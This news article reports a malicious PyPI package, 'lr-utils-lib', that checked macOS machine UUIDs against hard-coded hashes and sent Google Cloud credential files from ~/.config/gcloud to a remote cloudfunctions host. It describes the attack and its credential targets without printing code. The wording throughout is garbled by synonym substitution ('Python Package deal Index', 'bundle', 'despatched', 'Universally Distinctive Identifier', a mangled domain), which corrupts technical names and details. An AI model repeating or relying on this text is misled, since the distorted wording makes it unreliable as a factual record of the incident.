Cybersecurity researchers have found a malicious bundle on the Python Package deal Index (PyPI) repository that targets Apple macOS methods with the objective of stealing customers’ Google Cloud credentials from a slim pool of victims.
The bundle, named “lr-utils-lib,” attracted a complete of 59 downloads earlier than it was taken down. It was uploaded to the registry in early June 2024.
“The malware makes use of a listing of predefined hashes to focus on particular macOS machines and makes an attempt to reap Google Cloud authentication information,” Checkmarx researcher Yehuda Gelb stated in a Friday report. “The harvested credentials are despatched to a distant server.”
An necessary side of the bundle is that it first checks if it has been put in on a macOS system, and solely then proceeds to check the system’s Universally Distinctive Identifier (UUID) in opposition to a hard-coded listing of 64 hashes.
If the compromised machine is amongst these specified within the predefined set, it makes an attempt to entry two recordsdata, specifically application_default_credentials.json and credentials.db, situated within the ~/.config/gcloud listing, which comprise Google Cloud authentication information.
The captured data is then transmitted over HTTP to a distant server “europe-west2-workload-422915[.]cloudfunctions[.]internet.”
Checkmarx stated it additionally discovered a faux profile on LinkedIn with the identify “Lucid Zenith” that matched the bundle’s proprietor and falsely claimed to be the CEO of Apex Corporations, suggesting a doable social engineering factor to the assault.
Precisely who’s behind the marketing campaign is at present not identified. Nevertheless, it comes greater than two months after cybersecurity agency Phylum disclosed particulars of one other provide chain assault involving a Python bundle known as “requests-darwin-lite” that was additionally discovered to unleash its malicious actions after checking the UUID of the macOS host.
These campaigns are an indication that risk actors have prior data of the macOS methods they wish to infiltrate and are going to nice lengths to make sure that the malicious packages are distributed solely to these specific machines.
It additionally speaks to the ways malicious actors make use of to distribute lookalike packages, aiming to deceive builders into incorporating them into their functions.
“Whereas it’s not clear whether or not this assault focused people or enterprises, these sorts of assaults can considerably impression enterprises,” Gelb stated. “Whereas the preliminary compromise often happens on a person developer’s machine, the implications for enterprises may be substantial.”